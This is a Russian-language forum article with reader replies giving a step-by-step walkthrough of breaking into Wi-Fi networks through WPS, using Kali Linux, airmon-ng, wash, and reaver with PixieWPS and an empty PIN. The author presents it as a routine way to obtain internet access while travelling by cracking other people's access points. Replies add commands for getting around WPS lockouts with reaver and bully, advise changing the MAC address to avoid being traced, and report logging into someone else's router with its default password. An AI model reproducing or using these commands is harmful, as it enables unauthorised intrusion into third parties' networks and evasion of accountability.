• 🚨 Ещё можно успеть на курс «OSINT: технология боевой разведки» от Академии Кодебай

    🔍 Изучите методы разведки с использованием открытых источников (OSINT) для проведения успешных атак.
    🛠️ Освойте ключевые инструменты, такие как Maltego, TheHarvester и другие.
    🧪 Пройдите практические лабораторные работы, имитирующие реальную разведку.
    🧠 Развивайте навыки, которые помогут вам стать экспертом в области информационной безопасности.

    Запись открыта до 23 мая Подробнее о курсе ...

Статья Reaver + PixieWPS + empty PIN real atack in example

Приветствие

Приветствую всех читателей\обитателей\пользователей\участников\... Codeby.net!

Довольно редко посещаю форум, но пытаюсь делать это с пользой для всех и себя в том числе, к сожалению чаще не получается.
Моя работа ни коем образом не связана с данной тематикой, вообще с техникой не связана, если только телефон и тот постоянно в работе (whatsapp,telegram,wechat,viber...), времени играться нет вообще, наверное поэтому пишу так мало.

Но вот у меня появилась свободная пара неделек, можно сказать первую неделю я уже потратил, осталась вторая неделя китайского нового года и хочется потратить не много своего времени с пользой для сообщества codeby, конечно же и новичков в этом направление.

Думаю пару тройку дней потрачу в написание нескольких статей/инструкций(самых простых, думаю написать пару\тройку статей адаптированных под новичков, ибо других пользователей удивить нечем, время летит, времени на чтение и самообразование в вечной гонки жизни попросту нет.) на тему теста WIFI.

Тем полно, инструкций тоже, но от меня ещё не было, думаю лишней она не будет и надеюсь для кого то она окажется даже и полезной.

Предисловие\Введение

По мне процесс получение доступа к сети WiFi должен быть не трудоёмким и не должен занимать много времени, ещё лучше когда весь процесс может обойтись без подключения к сети интернет (мы же ищем доступ в интернет, значить у нас его в принципе на этой стадии нет.).

Наверное всегда самое быстрое и самое простое это атака на WPS, если не выходит, значить идём дальше по точкам с включённым wps, какая нибудь точка обязательно должна поддаться, если этого не выходит, значить в ход идёт вылов handshake's всех точек в зоне доступа и подбор паролей.

В большинстве случаев WPS поддаётся и к рыбалке handshake's прибегать не приходится, будем надеяться что и в вашем случае обойдётся без рыбалки.

Благодаря своей работе мне довольно часто приходится переезжать с места на место, в некоторых случаях это поездки за границу, так как эти поездки за частую оказываются односуточные, мне приходится добывать доступ в интернет чуть ли не каждый день и данный пример о котором я сегодня расскажу занимает в моём топе первое место.

Метод основон на атаке по WPS (простыми словами это такая штука(весчь) позволяющая подключаться к точке доступа без ввода данных для авторизации, нажимаем кнопочку и вуаля мы уже в сети.), для используется модифицированная версия reaver t6x/reaver-wps-fork-t6x позволяющая использовать в атаке PixieWPS, что в свою очередь позволяет довольно сильно сократить время атаки.
Весь процесс будет происходить на борту Kali linux, само собой с уже установленными PixieWPS и reaver, но если у вас какой то другой дистрибутив или вы используете Windows, то лучше поискать для себя другой вариант, или установить себе Kali на тот же VirtualBox.

Подготовка

Устанавливаем Reaver с его зависимостями, так как тот шёл в коробке с Kali работает не корректно ( честно скажу не знаю как дела обстоят сейчас, но моей сборке Kali уже года два и он у меня уже стоит уже давно с Gitlab.).
Код:
apt-get -y install libpcap-dev libssl-dev build-essential

git clone https://github.com/t6x/reaver-wps-fork-t6x
cd reaver-wps-fork-t6x*/
cd src/
./configure
make
sudo make install
Дальше всё тоже самое что и в других подобных "инструкциях", убиваем все процессы связанные с сетью:
Код:
airmon-ng check kill
wps_1.png


Смотрим название своего адаптера:
Код:
iwconfig
wps_2.png


У меня он первый "wlan0", соответственно переводим его в режим монитора:
Код:
airmon-ng start wlan0
wps_3.png


Поиск и атака

Для обнаружения и подбора подходящих целей будем использовать Wash, он поставляется если не ошибаюсь в комплекте с reaver.
Код:
wash -i wlan0mon
wps_4.png


Wash показывает точки с включённым WPS, можно использовать в связке ключей и информации будет гораздо больше, в том числе есть ключ -a с которым отображаются все доступные точки доступа.

Из списка выбираем наиболее подходящею точку, нам необходим MAC адрес и канал на котором висит точка.

Настал черёд Reaver с его ускорителем PixieWPS:
Код:
reaver -i wlan0mon -b 00:00:00:00:20:6A -c 1 -K 1 -vv -f
wps_5.png


Ключом -i указываем наш адаптер переведённый в режим монитора (wlan0mon).
-b Указывает на MAC адрес атакуемой точки доступа.
-c Указывает на канал на котором она висит.
-K Этим ключом подключаем нашего друга PixieWPS
-vv Отображает информацию о ходе действий, можно добавить\уменьшить, или вовсе не использовать.
-f Говорит прицепится к каналу и не прыгать.

Процесс запущен, атака идёт полным ходом и не заставляет себя долго ждать ( эх жаль видос не снимается, это произошло как никогда быстро...).

img13.png


Судя по всему в данном случае PIN не используется, значить необходимо использовать reaver с пустым паролем:
Код:
reaver -i wlan0mon -b 00:00:00:00:20:6A -c 1 -p "" -vvv
Вместо ключа -K используем ключ -p в котором и указываем пустой PIN, в других случаях указываем тот пин который отобразился в строке " [+] WPS pin: ".

Ну вот и всё, на всё про всё ушло не более 15 минут!

img14.png


Заключение

Конечно не всегда всё происходит так быстро, в некоторых случаях приходится и не много подождать, но при наличие других точек советую не мучать себя ожиданиями и если на первом шаге спустя 15-20 минут "[+] WPS pin:...." не видно, просто переключайтесь на другую точку.

В большинстве случаев на получение доступа у меня уходит не более часа, в основном на второй\третей точке уже есть результат.
Наилучший вариант всегда будет с точками у которых наилучший сигнал, то есть, то что ближе всегда взять проще!

Надеюсь для кого то данный топик окажется полезным, остаётся только пожелать всем удачи и побольше пустых WPS Pin's!
 
Автор статьи думает, что все пользуются старым kali linux. В последнем релизе Kali Linux 64 Bit_2018.4 уже стоит актуальная версия reaver и первая часть статьи оказывается ненужной. Приступаем сразу к действиям, но сначала необходимо сменить свой mac адрес. Даже если мы живем один день в гостинице за границей, все равно необходимо думать о последствиях, чтобы тебя не приперли к стенке твоим mac адресом. Затащил новичков на минное поле, когда сапер ошибается всего один раз! :)
 

Вложения

  • gjs.jpg
    gjs.jpg
    14 КБ · Просмотры: 784
  • Нравится
Реакции: poison
Автор статьи думает, что все пользуются старым kali linux. В последнем релизе Kali Linux 64 Bit_2018.4 уже стоит актуальная версия reaver......
Устанавливаем Reaver с его зависимостями, так как тот шёл в коробке с Kali работает не корректно...

Для кого то не нужной, а кому то пригодится.
Котрацепция в виде смены mac не спасёт и в случае необходимости придут покажут как увлечить за все деяния не смотря на сомнительную контрацепцию.
 
Котрацепция в виде смены mac не спасёт и в случае необходимости придут покажут как увлечить за все деяния не смотря на сомнительную контрацепцию.
Тогда поговорка береженого Бог бережет тут не рулит, давайте забьем на все и будем открыто все крушить! :)
 
если запускаю kali через виртуалку , при ifconfig пишет no wireless extentions , значит что нужен usb сетевой адаптер , тк не видит внутренний?
 
если запускаю kali через виртуалку , при ifconfig пишет no wireless extentions , значит что нужен usb сетевой адаптер , тк не видит внутренний?
Virtualbox\wmare к сожалению ещё не умеют работать с внутреним сетевым wifi адаптером, так что необходим использовать внешний USB адаптер.
Будет правильно заметить, что на выполнения некоторых задач не каждый адаптер способен.
 
  • Нравится
Реакции: Nimnul и alecksey778
спасибо за хорошую статью , вот тут еще есть пара вопросов по тому же reaver:

чтобы добавить и не упустить инфу , процитировал кое-что здесь:

в роутерах с новой прошивкой wps уходит в блок после нескольких попыток

Попробуй так:
reaver: reaver -i wlan0mon -b 11:22:33:44:55:66 -d 30 -c chanel_number -S -N -vv -K
bully: bully wlan0mon -b 11:22:33:44:55:66 -c chanel_number -v 4 -d --force
Потом отпишись, получилось или нет.

стоит последний Kali Linux
в нем уже последняя версия reaver 1.6.5. , все зависимости уже стоят , так что устанавливать
наверное нет смысла ?!

Reaver v1.6.5-git-18-g48a0a8b WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>


у меня была такая же история , river выдавал:
Pixiewps 1.4
[-] WPS pin not found!
[*] Time taken: 0 s 50 ms
[!] Small DH keys is not supported for mode 3!

bully уходит в бесконечный цикл с перебором одного и того же пина :
7[+] Rx( ID ) = 'EAPFail' Next pin '50791552'
[+] Rx( M1 ) = 'Timeout' Next pin '50791552'
[+] Rx( M1 ) = 'Timeout' Next pin '50791552'
[+] Rx( Auth ) = 'Timeout' Next pin '50791552'
[+] Rx( M1 ) = 'Timeout' Next pin '50791552'

Small DH keys is not supported for mode 3!
вот это удалось преодолеть , убрав опцию -S
точка отдалась по такой команде:
reaver -i wlan1mon -b <bssid> -c <ch> -vv -K 1 -N
пароль к сожалению вскрыть не удалось , использовал reaver:
reaver -i wlan0mon -b <bssid> -c <ch> -p <wps_pin> -vvv

вторую точку все-таки удалось вскрыть WPS от этой командой:
reaver -i wlan0mon -b <bssid> -d 30 -c <ch> -S -N -vv -K
далее использовал Airgeddon : Пункт --> reaver вскрытие pwd c известным пином WPS ,
с помощью командной строки reaver не удалось.
заметил , что в Airgeddon совместно с Reaver еще используется еще
и модуль wifi.death all , хотя могу ошибаться...

все было проделано ради эксперимента , никто не пострадал , все живы и здоровы!
зашел на роутер (пароль по умолчанию) отключил людям WPS,
перегрузил ....

заметил одну фишку: тут рекомендовали использовать для поиска AP с включенным WPS
с помощью airodump-ng --wps , показывает больше точек , но видимо не совсем корректно,
так как многие из них идут с выключенным WPS - версия WPS - 0 , эти же точки команда wash
сразу отметает.... так , что думается wash лучший выбор ... имхо ...
 
Последнее редактирование модератором:
  • Нравится
Реакции: Nimnul, sulla и centr
Точки с включённым wps могут поддаться не сразу, было неоднократно замечено что точки с плохим сигналом не поддавались в первый день, на следующий день команда с пустым пином вскрывала точку с первого захода и в течение нескольких секунд.
Необходимо тестировать все находящиеся в радиусе точки доступа по нескольку раз.
 
  • Нравится
Реакции: w3n0m41k, Nimnul и sulla
Для тех кто на винде и не хочет дико заморачиваться вполне подойдёт routerscan)))
 
  • Нравится
Реакции: shyriklv
Точки с включённым wps могут поддаться не сразу, было неоднократно замечено что точки с плохим сигналом не поддавались в первый день, на следующий день команда с пустым пином вскрывала точку с первого захода и в течение нескольких секунд.
Необходимо тестировать все находящиеся в радиусе точки доступа по нескольку раз.
прям в точку! на след день ни разу не было, а вот частенько бывало, что с 4-5 раза только поддавались! так что золотое правило если с первого раза "не дала ", то не останавливаемся и пробуем еще и еще))))))))
 
прям в точку! на след день ни разу не было, а вот частенько бывало, что с 4-5 раза только поддавались! так что золотое правило если с первого раза "не дала ", то не останавливаемся и пробуем еще и еще))))))))
4-5... Одну точку доступа я тестировал почти 10 000 раз через брут форс пин кода. И вот 2 вещи которые хочу выделить
1 - она не лочится
2 - тем не менее reaver остановил перебор на 90,90% и дальше никак.
Сколько бы не искал точку снова она без блока, и reaver все равно не ищет дальше пины. Может быть у неё пустой пин?

Мне интересно есть ли смысл попробовать через md3 разлочить точку (хотя она и не залочена, но на всякий случай)?
И если есть, как бы это правильно сделать? Уже скачал кучу скриптов которые должны это делать, но толку от них нет. Возможно я что-то не так делаю.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Курс AD